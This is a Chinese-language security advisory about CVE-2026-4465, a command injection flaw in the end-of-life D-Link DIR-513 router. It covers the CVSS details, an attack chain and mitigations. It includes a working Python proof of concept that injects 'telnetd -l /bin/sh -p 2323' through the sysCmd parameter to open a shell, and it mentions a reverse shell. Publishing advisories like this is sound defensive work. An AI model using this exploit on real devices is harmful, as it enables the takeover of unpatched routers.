IPBUF安全漏洞报告
English
CVE-2026-4465 CVSS 6.3 中危

CVE-2026-4465 D-Link DIR-513 命令注入漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4465
漏洞类型
操作系统命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR-513

相关标签

命令注入RCED-LinkDIR-513IoT漏洞EOL

漏洞概述

D-Link DIR-513 1.10版本路由器被发现存在安全漏洞。该漏洞位于/goform/formSysCmd接口中,由于未对用户输入的sysCmd参数进行严格过滤,导致攻击者可进行操作系统命令注入。由于该产品已停止维护,攻击者可利用此漏洞远程发起攻击,获取设备控制权。

技术细节

该漏洞的根源在于D-Link DIR-513设备Web管理界面的/goform/formSysCmd处理函数中存在输入验证缺失。当攻击者向该端点发送POST请求时,可以通过构造恶意的sysCmd参数值(例如包含分号、管道符或反引号等Shell元字符),将任意操作系统命令传递给后端Shell执行。根据CVSS向量分析,该漏洞利用无需用户交互(UI:N),且攻击复杂度低(AC:L)。攻击者只需具备低权限(PR:L)即可通过网络(AV:N)远程利用此漏洞。成功利用后,攻击者可以完全控制设备操作系统,导致敏感信息泄露(C:L)、数据篡改(I:L)及服务中断(A:L)。

攻击链分析

STEP 1
侦察
攻击者识别网络中存在的D-Link DIR-513设备,并确认其运行受影响版本1.10。
STEP 2
漏洞利用
攻击者向目标设备的/goform/formSysCmd接口发送特制的HTTP POST请求,在sysCmd参数中注入恶意Shell命令。
STEP 3
命令执行
由于后端未过滤特殊字符,设备操作系统执行攻击者注入的任意命令。
STEP 4
建立控制
攻击者利用执行的命令(如开启Telnet服务或反弹Shell)获取设备系统的控制权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_ip = "192.168.0.1" url = f"http://{target_ip}/goform/formSysCmd" # Malicious payload to inject OS command (e.g., telnetd) # The vulnerable parameter is 'sysCmd' payload_data = { "sysCmd": "telnetd -l /bin/sh -p 2323" } try: # Send the POST request to exploit the vulnerability response = requests.post(url, data=payload_data, timeout=5) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if telnet is running on port 2323.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

D-Link DIR-513 1.10

防御指南

临时缓解措施
由于厂商已停止对该产品的支持,不存在官方补丁。建议立即更换受支持的设备。若暂时无法更换,请务必将设备置于防火墙后,阻断外部对HTTP/HTTPS管理端口的访问,并在局域网内通过ACL策略禁止非受信IP访问/goform/formSysCmd路径,或直接关闭Web管理服务。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表